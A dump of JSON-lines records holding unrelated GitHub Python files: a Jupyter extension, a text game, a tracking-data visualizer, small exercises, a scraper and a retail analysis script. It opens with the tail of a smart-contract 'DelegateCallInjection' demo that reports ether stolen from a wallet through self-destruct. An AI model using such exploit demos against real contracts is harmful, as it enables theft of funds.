= w3.eth.get_balance(accounts[1])-attack_init_balance\nstolen_ether = w3.fromWei(stolen_ether, 'ether')\nprint(f\"\\nAttacker was able to self destruct and steal {stolen_ether} from Wallet: {wallet.address}\")\n \n\n","repo_name":"jcrreis/solidity-tools-sandbox","sub_path":"Examples/DelegateCallInjection/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"10839466183","text":"\"\"\"\nNBScratch: Jupyter Notebook Extension placing a computational scratchpad in the\nnotebook\n\"\"\"\n\nimport os\nimport json\nimport datetime\n\nfrom notebook.utils import url_path_join\nfrom notebook.base.handlers import IPythonHandler, path_regex\n\nclass NBScratchHandler(IPythonHandler):\n\n # manage connections to various sqlite databases\n db_manager_directory = {}\n\n # check if extension loaded by visiting http://localhost:8888/api/nbscratch\n def get(self, path=''):\n \"\"\"\n Handle GET request\n \"\"\"\n\n html = \"NBScratch is working \"\n self.write(html)\n\n def post(self, path=''):\n \"\"\"\n Handle POST request\n \"\"\"\n\n print(\"Just got the NBScratch POST requst\")\n self.finish(json.dumps({'time': datetime.now()}))\n\ndef _jupyter_server_extension_paths():\n \"\"\"\n Jupyter server configuration\n returns dictionary with where to find server extension files\n \"\"\"\n return [{\n \"module\": \"nbscratch\"\n }]\n\ndef _jupyter_nbextension_paths():\n \"\"\"\n Jupyter nbextension configuration\n returns dictionary with where to find nbextension files\n \"\"\"\n return [dict(\n section=\"notebook\",\n # the path is relative to the `nbscratch` directory\n src=\"static\",\n # directory in the `nbscratch/` namespace\n dest=\"nbscratch\",\n # _also_ in the `nbscratch/` namespace\n require=\"nbscratch/main\")]\n\ndef load_jupyter_server_extension(nb_app):\n \"\"\"\n Load the server extension and set up routing to proper handler\n nb_app: (obj) Jupyter Notebook Application\n \"\"\"\n\n nb_app.log.info('NBScratch Server extension loaded')\n web_app = nb_app.web_app\n host_pattern = '.*$'\n route_pattern = url_path_join(web_app.settings['base_url'],\n r\"/api/nbscratch%s\" % path_regex)\n web_app.add_handlers(host_pattern, [(route_pattern, NBScratchHandler)])\n","repo_name":"acrule/nbscratch","sub_path":"nbscratch/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"70027269552","text":"Boss = False\nYou = 5\nEnemy = 5\nBoss_hp = 10\n\nwhile Enemy == 5:\n print(\"Enemy still stands\")\n Attack = int(input(\"Please choose a number: \"))\n\n if Attack >= 5:\n print(\"You defeated it!\")\n Enemy = 0\n break\n\n elif Attack <= 5:\n print(\"You did not do enough damage.\")\n\nif Enemy == 0:\n Boss = True\n\nwhile Boss == True:\n print(\"The boss stands before you\")\n Attack = int(input(\"Please choose a number: \"))\n\n if Attack >= 10:\n print(\"The boss falls\")\n print(\"Congratulations!\")\n break\n\n elif Attack <= 10:\n print(\"the boss survives and counters! Deals 3 damage!\")\n You = You - 3\n\n if You <= 0:\n print(\"YOU DIED\")\n exit()\n\n\n\n\n","repo_name":"Blackisrafil/testproject","sub_path":"practice projects/Def practice.py","file_name":"Def practice.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"35407448783","text":"import numpy as np\r\nimport pandas as pd\r\nfrom pandas import Grouper\r\nfrom data.nn_data.datasets.truck_dataset import TruckDataSet\r\nfrom data.nn_data.instance_segmentation_data import InstanceSegmentationData\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.patches as patches\r\n\r\nimport torch\r\nimport torch.nn.functional as F\r\nfrom pathlib import Path\r\n\r\nfrom data.user_data.eye_data import EyeData\r\nfrom data.user_data.hand_data import HandData\r\nfrom data.user_data.head_data import HeadData\r\nfrom math_helper.math_helper import MathHelper\r\nimport constants\r\n\r\nfrom sklearn import metrics\r\nfrom sklearn.preprocessing import LabelBinarizer\r\nfrom sklearn.metrics import roc_curve, auc, RocCurveDisplay, roc_auc_score, confusion_matrix, ConfusionMatrixDisplay\r\n\r\nfrom itertools import cycle\r\n\r\n\r\nclass Visualizer():\r\n\r\n def __init__(self) -> None:\r\n pass\r\n\r\n def visualize_head_data(self,\r\n df_tracking_data_preprocessed: pd.DataFrame,\r\n head_labels: list[list[str]]) -> None:\r\n\r\n first_intention = df_tracking_data_preprocessed.loc[df_tracking_data_preprocessed[\"SessionType\"] == 1]\r\n second_intention = df_tracking_data_preprocessed.loc[df_tracking_data_preprocessed[\"SessionType\"] == 2]\r\n third_intention = df_tracking_data_preprocessed.loc[df_tracking_data_preprocessed[\"SessionType\"] == 3]\r\n\r\n fig = plt.figure()\r\n ax = fig.add_subplot(projection='3d')\r\n index = 0\r\n image_index = 0\r\n\r\n x_label = \"x - coord\"\r\n x_range = [-1, 1]\r\n y_label = \"y - coord\"\r\n y_range = [-1, 1]\r\n z_label = \"z - coord\"\r\n z_range = [-1, 1]\r\n\r\n labels = [\"FirstIntention\", \"SecondIntention\", \"ThirdIntention\"]\r\n marker = ['o', 'o', 'o']\r\n colors = [\"aqua\", \"fuchsia\", \"lawngreen\"]\r\n marker_size = 1\r\n\r\n ax.scatter(first_intention[head_labels[0][0]], first_intention[head_labels[0][2]], first_intention[head_labels[0][1]],\r\n marker=marker[0],\r\n s=marker_size,\r\n color=colors[0],\r\n label=labels[0])\r\n \r\n ax.scatter(second_intention[head_labels[0][0]], second_intention[head_labels[0][2]], second_intention[head_labels[0][1]],\r\n marker=marker[1],\r\n s=marker_size,\r\n color=colors[1],\r\n label=labels[1])\r\n \r\n ax.scatter(third_intention[head_labels[0][0]], third_intention[head_labels[0][2]], third_intention[head_labels[0][1]],\r\n marker=marker[2],\r\n s=marker_size,\r\n color=colors[2],\r\n label=labels[2])\r\n\r\n ax.set_xlabel(x_label)\r\n ax.set_xlim(x_range)\r\n ax.set_ylabel(z_label)\r\n ax.set_ylim(z_range)\r\n ax.set_zlabel(y_label)\r\n ax.set_zlim(y_range)\r\n plt.title(f\"Head data from one user\")\r\n\r\n path = constants.VISUALIZER_IMAGE_PATH + \"AllUsers/Head\"\r\n Path(path).mkdir(parents=True, exist_ok=True)\r\n \r\n plt.legend(loc='upper center', bbox_to_anchor=(0.5, -0.05),\r\n fancybox=True, shadow=True, ncol=4)\r\n plt.show()\r\n plt.savefig(path + \"/\" + f\"HeadData.png\")\r\n plt.close()\r\n\r\n def visualize_all_2d_positions_screen_space(self,\r\n df_tracking_data_preprocessed: pd.DataFrame,\r\n position_labels: list[list[str]],\r\n user_name: str,\r\n intention: str,\r\n marker: list[str] = ['o', 'x', 'x'],\r\n visualize_bursts: bool = True,\r\n step_size: int = 5,\r\n offset: int = 0,\r\n colors: list[str] = ['b', 'g', 'r'],\r\n visualize_3d: bool = True,\r\n burst_size: int = constants.SLIDING_WINDOW_SIZE) -> None:\r\n\r\n labels = [\"Eye\", \"Right Hand\", \"Left Hand\"]\r\n\r\n index = 0\r\n image_index = 0\r\n while ((index + burst_size) < df_tracking_data_preprocessed.shape[0]):\r\n\r\n if visualize_3d:\r\n\r\n fig = plt.figure()\r\n ax = fig.add_subplot(projection='3d')\r\n\r\n for position_label_index, position_label in enumerate(position_labels):\r\n\r\n positions = df_tracking_data_preprocessed[position_label].to_numpy()\r\n\r\n correct_x_positions = np.logical_and(positions[:, 0] >= -1, positions[:, 0] <= 1)\r\n correct_y_positions = np.logical_and(positions[:, 1] >= -1, positions[:, 1] <= 1)\r\n correct_positions = np.logical_and(correct_x_positions, correct_y_positions)\r\n\r\n\r\n positions = positions[correct_positions]\r\n # we ignore the very first and very last samples\r\n positions = positions[offset:-offset]\r\n if (positions.shape[0] == 0):\r\n continue\r\n position_x = positions[:, 0]\r\n position_y = positions[:, 1]\r\n\r\n from_index = index\r\n to_index = from_index + burst_size\r\n burst_position_x = position_x[from_index:to_index]\r\n burst_position_y = position_y[from_index:to_index]\r\n\r\n # here go from screen space to NDC\r\n burst_position_x = ((burst_position_x + 1) / 2) * constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_X\r\n burst_position_y = ((burst_position_y + 1) / 2) * constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_Y\r\n\r\n x_label = \"x - coord\"\r\n x_range = [0, constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_X]\r\n y_label = \"y - coord\"\r\n y_range = [0, constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_Y]\r\n\r\n if visualize_3d:\r\n\r\n time_axis = np.arange(len(burst_position_x))\r\n\r\n ax.scatter(burst_position_x, time_axis, burst_position_y,\r\n marker=marker[position_label_index],\r\n color=colors[position_label_index],\r\n label=labels[position_label_index])\r\n\r\n ax.set_xlabel(x_label)\r\n ax.set_xlim(x_range)\r\n ax.set_ylabel(\"time\")\r\n # ax.set_ylim(y_range)\r\n ax.set_zlabel(y_label)\r\n ax.set_zlim(y_range)\r\n plt.title(f\"User data with {intention} over #{burst_size} samples burst\")\r\n\r\n else:\r\n \r\n plt.title(f\"Accumulated user data with {intention} over #{burst_size} samples burst\")\r\n plt.xlabel(x_label)\r\n plt.ylabel(y_label)\r\n plt.xlim(x_range)\r\n plt.ylim(y_range)\r\n plt.scatter(burst_position_x, burst_position_y,\r\n marker=marker[position_label_index],\r\n color=colors[position_label_index],\r\n label=labels[position_label_index])\r\n\r\n\r\n path = constants.VISUALIZER_IMAGE_PATH + user_name + \"/\" + intention + \"/\" + \"Bursts\"\r\n Path(path).mkdir(parents=True, exist_ok=True)\r\n \r\n plt.legend(loc='upper center', bbox_to_anchor=(0.5, -0.05),\r\n fancybox=True, shadow=True, ncol=4)\r\n plt.savefig(path + \"/\" + f\"Accumulated user data from {user_name} with intention {intention} burst {image_index}.png\")\r\n plt.close()\r\n index += step_size\r\n image_index += 1\r\n\r\n def compare_different_burst_sizes(self,\r\n different_burst_sizes) -> None:\r\n\r\n path = constants.MODELS_DATA_PATH\r\n Path(path).mkdir(parents=True, exist_ok=True)\r\n\r\n x = []\r\n y = []\r\n for index in range(len(different_burst_sizes)):\r\n x.append(different_burst_sizes[index][0])\r\n y.append(different_burst_sizes[index][1][\"mean_test_balanced_accuracy\"])\r\n\r\n plt.title(\"Compare different burst sizes\")\r\n plt.plot(x, y, label='compare burst sizes')\r\n plt.legend(loc='best')\r\n # plt.show()\r\n plt.savefig(path + \"/\" + \"BurstSizesCompare.png\")\r\n plt.close()\r\n\r\n\r\n\r\n def plot_losses(self, clf, burst_size: int) -> None:\r\n\r\n path = constants.MODELS_DATA_PATH + f\"BurstSize_{burst_size}\"\r\n Path(path).mkdir(parents=True, exist_ok=True)\r\n loss_curve = clf.best_estimator_[1].loss_curve_\r\n\r\n plt.title(\"Training losses\")\r\n plt.plot(loss_curve, label='losses')\r\n plt.legend(loc='best')\r\n # plt.show()\r\n plt.savefig(path + \"/\" + \"Losses.png\")\r\n plt.close()\r\n\r\n def plot_accuracy(self, clf, burst_size: int) -> None:\r\n\r\n path = constants.MODELS_DATA_PATH + f\"BurstSize_{burst_size}\"\r\n Path(path).mkdir(parents=True, exist_ok=True)\r\n\r\n colors = [\"aqua\", \"darkorange\", \"cornflowerblue\", \"lawngreen\"]\r\n\r\n validation_scores = clf.best_estimator_[1].validation_scores_\r\n\r\n plt.plot(validation_scores, label='validation scores', color=colors[0])\r\n\r\n plt.title(\"Accuracy\")\r\n plt.legend(loc='best')\r\n # plt.show()\r\n plt.savefig(path + \"/\" + \"Accuracy.png\")\r\n plt.close()\r\n\r\n\r\n def plot_confusion_matrix(self, clf, X_test, y_test, burst_size: int) -> None:\r\n\r\n predictions = clf.predict(X_test)\r\n cm = confusion_matrix(y_test, predictions, labels=clf.classes_)\r\n disp = ConfusionMatrixDisplay(confusion_matrix=cm,\r\n display_labels=clf.classes_)\r\n disp.plot()\r\n path = constants.MODELS_DATA_PATH + f\"BurstSize_{burst_size}\"\r\n Path(path).mkdir(parents=True, exist_ok=True)\r\n # plt.show()\r\n plt.savefig(path + \"/\" + \"ConfusionMatrix.png\")\r\n plt.close()\r\n\r\n\r\n def plot_all_OvR_ROC_curves(self, model, testX, testY,\r\n class_labels: list[str],\r\n label_binarizer,\r\n burst_size: int) -> None:\r\n\r\n y_score = model.predict_proba(testX)\r\n n_classes = 4\r\n\r\n fig, ax = plt.subplots(figsize=(6, 6))\r\n\r\n y_onehot_test = label_binarizer.transform(testY)\r\n\r\n fpr, tpr, roc_auc = dict(), dict(), dict()\r\n # Compute micro-average ROC curve and ROC area\r\n aux1 = testY.ravel()\r\n aux2 = y_score.ravel()\r\n fpr[\"micro\"], tpr[\"micro\"], _ = roc_curve(y_onehot_test.ravel(), y_score.ravel())\r\n roc_auc[\"micro\"] = auc(fpr[\"micro\"], tpr[\"micro\"])\r\n\r\n plt.plot(\r\n fpr[\"micro\"],\r\n tpr[\"micro\"],\r\n label=f\"micro-average ROC curve (AUC = {roc_auc['micro']:.2f})\",\r\n color=\"deeppink\",\r\n linestyle=\":\",\r\n linewidth=4,\r\n )\r\n\r\n for i in range(n_classes):\r\n\r\n fpr[i], tpr[i], _ = roc_curve(y_onehot_test[:, i], y_score[:, i])\r\n roc_auc[i] = auc(fpr[i], tpr[i])\r\n\r\n fpr_grid = np.linspace(0.0, 1.0, 1000)\r\n\r\n # Interpolate all ROC curves at these points\r\n mean_tpr = np.zeros_like(fpr_grid)\r\n\r\n for i in range(n_classes):\r\n mean_tpr += np.interp(fpr_grid, fpr[i], tpr[i]) # linear interpolation\r\n\r\n # Average it and compute AUC\r\n mean_tpr /= n_classes\r\n\r\n fpr[\"macro\"] = fpr_grid\r\n tpr[\"macro\"] = mean_tpr\r\n roc_auc[\"macro\"] = auc(fpr[\"macro\"], tpr[\"macro\"])\r\n\r\n plt.plot(\r\n fpr[\"macro\"],\r\n tpr[\"macro\"],\r\n label=f\"macro-average ROC curve (AUC = {roc_auc['macro']:.2f})\",\r\n color=\"navy\",\r\n linestyle=\":\",\r\n linewidth=4,\r\n )\r\n\r\n colors = cycle([\"aqua\", \"darkorange\", \"cornflowerblue\", \"lawngreen\"])\r\n for class_id, color in zip(range(n_classes), colors):\r\n RocCurveDisplay.from_predictions(\r\n testY,\r\n y_score[:, class_id],\r\n name=f\"{class_labels[class_id]} vs the rest\",\r\n color=color,\r\n pos_label=class_id,\r\n ax=ax,\r\n )\r\n\r\n plt.plot([0, 1], [0, 1], \"k--\", label=\"chance level (AUC = 0.5)\")\r\n plt.axis(\"square\")\r\n plt.xlabel(\"False Positive Rate\")\r\n plt.ylabel(\"True Positive Rate\")\r\n plt.title(\"One-vs-Rest ROC curves:\\n\")\r\n plt.legend()\r\n path = constants.MODELS_DATA_PATH + f\"BurstSize_{burst_size}\"\r\n Path(path).mkdir(parents=True, exist_ok=True)\r\n # plt.show()\r\n plt.savefig(path + \"/\" + \"One-vs-Rest ROC curves.png\")\r\n plt.close()\r\n\r\n\r\n def visualize_results(self,\r\n df_tracking_data_old: pd.DataFrame,\r\n df_tracking_data_preprocessed: pd.DataFrame,\r\n eye_data: EyeData,\r\n in_or_out_labels_eye_hit_pos: list[str],\r\n hand_data: HandData,\r\n in_or_out_labels_hand_pos: list[str],\r\n head_data: HeadData,\r\n instance_segmentation_data: InstanceSegmentationData,\r\n masks: np.array,\r\n user_name: str,\r\n intention: str,\r\n columns=1,\r\n rows=1,\r\n max_number_of_batches=50) -> None:\r\n \"\"\"\r\n For data understanding and debugging purposes\r\n \"\"\"\r\n mask_columns_joined = instance_segmentation_data.get_joined_mask_columns()\r\n class_labels = instance_segmentation_data.get_class_labels()\r\n class_probs = instance_segmentation_data.get_prob_labels()\r\n\r\n eye_hit_Pos_screen_space = eye_data.get_new_position_labels()[0]\r\n right_index_tip_Pos_screen_space = hand_data.get_new_position_labels()[0]\r\n left_index_tip_Pos_screen_space = hand_data.get_new_position_labels()[1]\r\n\r\n matplotlib.use('Agg')\r\n\r\n # batch some masks together in some plot\r\n batch_size = (columns * rows)\r\n # iterate over time\r\n saved_fig = 0\r\n for u in range(masks.shape[1] // batch_size):\r\n\r\n plt.axis('off')\r\n fig, axs = plt.subplots(rows, columns, figsize=(15, 15), squeeze=False)\r\n\r\n dataset = TruckDataSet()\r\n labels = dataset.get_labels()\r\n\r\n # plot multiple time steps at once\r\n for i in range(0, rows):\r\n for j in range(0, columns):\r\n\r\n axs[i, j].invert_yaxis()\r\n # ax1 = fig.add_subplot(rows, columns, i)\r\n global_index = u * batch_size + (i * columns + j)\r\n\r\n img_count = 0\r\n\r\n # iterate over all mask of a time step\r\n for m in range(len(mask_columns_joined)):\r\n\r\n # all masks from the #m instance segmentation mask\r\n masks_of_segmentation_result_m = masks[m]\r\n class_labels_of_segmentation_result_m = df_tracking_data_old[class_labels[m]]\r\n class_probs_of_segmentation_result_m = df_tracking_data_old[class_probs[m]]\r\n\r\n if (labels[class_labels_of_segmentation_result_m[global_index]] != \"platform\"):\r\n continue\r\n\r\n img_count += 1\r\n\r\n eye_hit_pos_in_or_out = df_tracking_data_preprocessed[in_or_out_labels_eye_hit_pos[0][m]].iloc[global_index]\r\n right_index_tip_pos_in_or_out = df_tracking_data_preprocessed[in_or_out_labels_hand_pos[0][m]].iloc[global_index]\r\n left_index_tip_pos_in_or_out = df_tracking_data_preprocessed[in_or_out_labels_hand_pos[1][m]].iloc[global_index]\r\n\r\n window_shape = (constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_Y, constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_X)\r\n torch_resized = F.interpolate(input=torch.from_numpy(masks_of_segmentation_result_m[global_index])[None, None], size=window_shape, mode='bilinear', align_corners=False)[0]\r\n img = axs[i, j].imshow(torch_resized[0].numpy(), origin='upper')\r\n\r\n if (img_count == 0):\r\n break\r\n\r\n plt.title(f\"Segmentation masks \\n with projected user data in screen space \\nt = {u}\", fontsize=20)\r\n plt.colorbar(img, ax=axs[i, j], orientation='horizontal')\r\n\r\n eye_hit_pos_ndc = MathHelper.screen_space_to_ndc(np.array([(float)(df_tracking_data_preprocessed[eye_hit_Pos_screen_space[0]][global_index]),\r\n (float)(df_tracking_data_preprocessed[eye_hit_Pos_screen_space[1]][global_index])],\r\n dtype=float),\r\n np.array([constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_X,\r\n constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_Y],\r\n dtype=int))\r\n\r\n right_index_tip_pos_ndc = MathHelper.screen_space_to_ndc(np.array([(float)(df_tracking_data_preprocessed[right_index_tip_Pos_screen_space[0]][global_index]),\r\n (float)(df_tracking_data_preprocessed[right_index_tip_Pos_screen_space[1]][global_index])],\r\n dtype=float),\r\n np.array([constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_X,\r\n constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_Y],\r\n dtype=int))\r\n\r\n left_index_tip_pos_ndc = MathHelper.screen_space_to_ndc(np.array([(float)(df_tracking_data_preprocessed[left_index_tip_Pos_screen_space[0]][global_index]),\r\n (float)(df_tracking_data_preprocessed[left_index_tip_Pos_screen_space[1]][global_index])],\r\n dtype=float),\r\n np.array([constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_X,\r\n constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_Y],\r\n dtype=int))\r\n\r\n marker_size = 500\r\n axs[i, j].scatter(eye_hit_pos_ndc[0],\r\n eye_hit_pos_ndc[1],\r\n color='ghostwhite',\r\n s=marker_size,\r\n label=eye_hit_Pos_screen_space[0].split('(')[0])\r\n\r\n axs[i, j].scatter(right_index_tip_pos_ndc[0],\r\n right_index_tip_pos_ndc[1],\r\n color='orangered',\r\n marker='x',\r\n s=marker_size,\r\n label=right_index_tip_Pos_screen_space[0].split('(')[0])\r\n\r\n axs[i, j].scatter(left_index_tip_pos_ndc[0],\r\n left_index_tip_pos_ndc[1],\r\n color='g',\r\n marker='x',\r\n s=marker_size,\r\n label=left_index_tip_Pos_screen_space[0].split('(')[0])\r\n\r\n axs[i, j].set_xlabel('x-coord')\r\n axs[i, j].set_ylabel('y-coord')\r\n axs[i, j].legend(loc='lower left', fontsize='xx-large')\r\n\r\n fig.tight_layout()\r\n\r\n if (img_count == 0):\r\n continue\r\n\r\n path = constants.VISUALIZER_IMAGE_PATH + user_name + \"/\" + intention\r\n\r\n Path(path).mkdir(parents=True, exist_ok=True)\r\n\r\n plt.savefig(path + \"/\" + f\"instance_segmentation_masks_t_{saved_fig}.png\")\r\n saved_fig += 1\r\n\r\n plt.clf()\r\n plt.cla()\r\n plt.close(fig)\r\n","repo_name":"Kataglyphis/Designing-User-adaptive-Content-for-Mixed-Reality-Using-Eye-and-Hand-Tracking","sub_path":"UserGuidanceAI/visualization/visualizer.py","file_name":"visualizer.py","file_ext":"py","file_size_in_byte":21093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"30899051666","text":"# Program created by Brayan Vera. Date 07/12/21\n\n# Program name: Palindrome_Num_Identifier\n# -This program makes sure to accept only palindrome numbers.\n# -This means the number that is the same as reversed.\n# -This program returns True if palindrome number is entered,\n# returns False otherwise.\n# -This program does not accept negative numbers.\n# -Thisprogram does not accept strings.\n# Example:\n# 121 is good = True\n# 12321 is good = True\n# 122221 is good = True\n# 1211121 is good = True\n# 2222 is good = True\n# 1221 is good = True\n# -121 not valid = False\n\n# Found another technique:\n# -This program does not follow this technique, but we can also check last digit and first digit\n# incrementing and decrementing the indexes until we reach the middle and stop the program.\n\n# The way this program operates is by storing the input in a list that separates each digit\n# Then another list in reverse is created and in the end is compared to see if is a palindrome.\ndef palindrome_check(x):\n # Makes sure to not accept strings.\n if isinstance(x,str) == True:\n print(\"Invalid input, only numbers please, no string.\")\n return False\n # Makes sure does not accept negative numbers.\n if x < 0:\n print(\"Not valid, only possitive numbers please.\")\n return False\n\n # Conversts the number to a string.\n int_to_str = str(x)\n # To split each number value individually and placed them into a list.\n n = 1\n split_string = [int_to_str[index: index + n] for index in range(0, len(int_to_str), n)]\n #print(\"The first string: {}\".format(split_string))\n\n # Creating a new list to store the given list before it disappears when poping.\n store_old_str = []\n for store_old in split_string:\n store_old_str.append(store_old)\n\n new_list = []\n # Used to pop the last value of the old list and storing it into a new list.\n while len(split_string) != 0:\n last_val_pop = split_string.pop()\n new_list.append(last_val_pop)\n #print(\"The new list: {}\".format(new_list))\n\n #print(\"The old string is : {}\".format(store_old_str))\n #print(\"The new reversed string is : {}\".format(new_list))\n\n if store_old_str == new_list:\n print(\"Is a palindrome.\")\n return True\n else:\n print(\"Is not a palindrome.\")\n return False\n\ndef main():\n x = 155545 #Enter number here. \n palindrome_check(x)\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"blvera/Brayan-Vera-Projects","sub_path":"My LeetCode - Python solved problems/Palindrome_Num_Identifier.py","file_name":"Palindrome_Num_Identifier.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"17700881463","text":"import csv\n\n# open up numbers.csv\ncsv_file = open(\"numbers.csv\", \"r\")\ncsv_reader = csv.reader(csv_file)\n\n# open up reverse.csv\ncsv_new = open('reverse.csv', 'w')\ncsv_writer = csv.writer(csv_new)\n\n# take reversed csv_reader and dump into csv_writer\nfor row in csv_reader:\n row.reverse()\n csv_writer.writerow(row)\n\n# close both files, need to reopen csv_new as a read file\ncsv_file.close()\ncsv_new.close()\n\nwith open('reverse.csv', 'r') as reverseRows:\n for row in list(csv.reader(reverseRows)):\n # reset sum for each row\n sum = 0\n # for loop for each data point (30 columns) making sum for each row\n for i in range(30):\n sum += int(row[i])\n # average equation for each row\n average = float(sum / 30)\n # print that average, formatted to 2 decimal points\n print(\"The average for this row is: {:0.2f}\".format(average))\n\n\n","repo_name":"drewgillis9/Gillis_LMSC_261_ProblemSets","sub_path":"ProblemSet10/ProblemSet10.2.py","file_name":"ProblemSet10.2.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"27366390338","text":"import datetime\nimport json\n\nfrom common.automator_client import client\nfrom common.repos import ALL_REPOS\n\n\ndef get_items(org, repo, item_type):\n query_params = {\n \"org\": org,\n \"repo\": repo,\n \"item_type\": item_type,\n \"states[]\": ['CLOSED'],\n \"limit[]\": ['first', '100']\n }\n response = client.github.items.get(query_params=query_params)\n return json.loads(response.body)\n\n\ntotal_closed_prs = 0\nfor org in ALL_REPOS:\n for repo in ALL_REPOS[org]:\n items = get_items(org, repo, 'pull_requests')\n for item in items:\n closed_at = datetime.datetime.strptime(item['closedAt'], '%Y-%m-%dT%H:%M:%SZ')\n text = \"{}, {} , {}, {}, {}\".format(repo, item['url'], item['points'],\n item['reviewer_points'], closed_at.date())\n print(text)\n total_closed_prs = total_closed_prs + 1\n\nprint(\"There were a total of {} closed prs across all repos\".format(total_closed_prs))\n","repo_name":"sendgrid/dx-automator","sub_path":"examples/closed_prs.py","file_name":"closed_prs.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"38"}
+{"seq_id":"71757895472","text":"from bs4 import BeautifulSoup\nimport csv\nimport requests\nfrom pprint import pprint\n\nmelon_url = 'https://www.melon.com/chart/index.htm'\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'\n}\n\nresponse = requests.get(melon_url, headers=headers).text\n# pprint(response)\n\ndata = BeautifulSoup(response, 'html.parser')\n# print(data)\n\nsongs = data.select('#lst50')\n# print(songs)\n\nresult_list = []\nfor song in songs:\n rank = song.select_one('td:nth-child(2) > div > span.rank').text\n name = song.select_one('td:nth-child(6) > div > div > div.ellipsis.rank01 > span > a').text\n # artist = song.select_one('td:nth-child(6) > div > div > div.ellipsis.rank02 > a').text\n # artists = song.select('td:nth-child(6) > div > div > div.ellipsis.rank02 > a')\n artists = song.select('td:nth-child(6) > div > div > div.ellipsis.rank02 > span.checkEllipsis')\n # result_dict = {'rank': rank, 'name': name, 'artist': artist}\n # result_dict = {'rank': rank, 'name': name, 'artist': ','.join([artist.text for artist in artists])}\n result_dict = {'rank': rank, 'name': name, 'artist': [artist.text for artist in artists]}\n result_list.append(result_dict)\n# print(result_list)\n\nwith open('melon_rank_01.csv', 'w', encoding='utf-8', newline='') as csvfile:\n fieldnames = ('rank','name','artist')\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n for item in result_list:\n writer.writerow(item)","repo_name":"athletejuan/TIL","sub_path":"Python/SS4th/StartCamp/Write_Read/csv/practice/melon_rank_01.py","file_name":"melon_rank_01.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"11472003479","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport numpy as np\r\nimport warnings\r\nimport seaborn as sns\r\nimport plotly as py\r\nimport plotly.graph_objs as go\r\nimport plotly.offline as py\r\npy.offline.init_notebook_mode()\r\nwarnings.filterwarnings('ignore')\r\npd.set_option('display.max_columns',None)\r\nfile_path = './data.csv'\r\ndf = pd.read_csv(file_path)\r\n#print(df.head())\r\n#print(df.info())\r\n#print(df[df['InvoiceNo'].str[0] == 'C'])\r\n\r\n\r\n#数据清洗\r\nprint(df.apply(lambda x:sum(x.isnull())/len(x),axis=0))\r\ndf.drop(['Description'],axis=1,inplace=True)\r\n#print(df)\r\ndf['CustomerID'] = df['CustomerID'].fillna('U')\r\ndf['amount'] = df['Quantity']*df['UnitPrice']\r\n#print(df.info())\r\ndf['date']= [i.split(' ')[0] for i in df['InvoiceDate']]\r\n# df['InvoiceDate'] = pd.to_datetime(df['InvoiceDate'])\r\n# df['date'] = [i.strftime('%d-%m-%Y') for i in df['InvoiceDate']]\r\n\r\n# print(df.info())\r\n# print(df.head())\r\ndf['time'] = [i.split(' ')[1] for i in df['InvoiceDate']]\r\n#print(df[['time','date']])\r\ndf.drop(['InvoiceDate'],axis=1,inplace=True)\r\n#print(df['date'].head())\r\ndf['year'] = [i.split('/')[2] for i in df['date']]\r\ndf['month'] = [i.split('/')[0] for i in df['date']]\r\ndf['day'] = [i.split('/')[1] for i in df['date']]\r\n#print(df[['date','year','month','day']].head())\r\ndf['date'] = pd.to_datetime(df['date'])\r\ndf = df.drop_duplicates()\r\n# print(df.describe())\r\ndf2 = df.loc[df['UnitPrice']<=0]\r\n# print(df2.shape[0]/df.shape[0])\r\n# print(df2['UnitPrice'].groupby(by=df2['UnitPrice']).count())\r\n\r\n#数据分析\r\ndf1 = df.loc[(df['Quantity']<=0)]\r\ntt = pd.pivot_table(df1, index='year',columns = 'month', values = 'amount', aggfunc= np.sum)\r\n# print(tt)\r\ndf2 = df[(df['Quantity']>0) & (df['UnitPrice']>0)]\r\npp = pd.pivot_table(df2, index='year',columns = 'month', values = 'amount', aggfunc= np.sum)\r\n# print(pp)\r\n# print(np.abs(tt/pp))\r\nnp.abs(tt/pp).loc['2011'].mean()\r\n\r\n#画图(已解决)\r\n\r\nR_value = df.groupby('CustomerID')['date'].max()\r\ndf2['date'].max()\r\nR_value = (df2['date'].max()-R_value).dt.days\r\nF_value = df2.groupby('CustomerID')['InvoiceNo'].nunique()\r\nM_value = df2.groupby('CustomerID')['amount'].sum()\r\nsns.set(style = 'darkgrid')\r\n# plt.hist(R_value)\r\n# plt.show()\r\nR_bins = 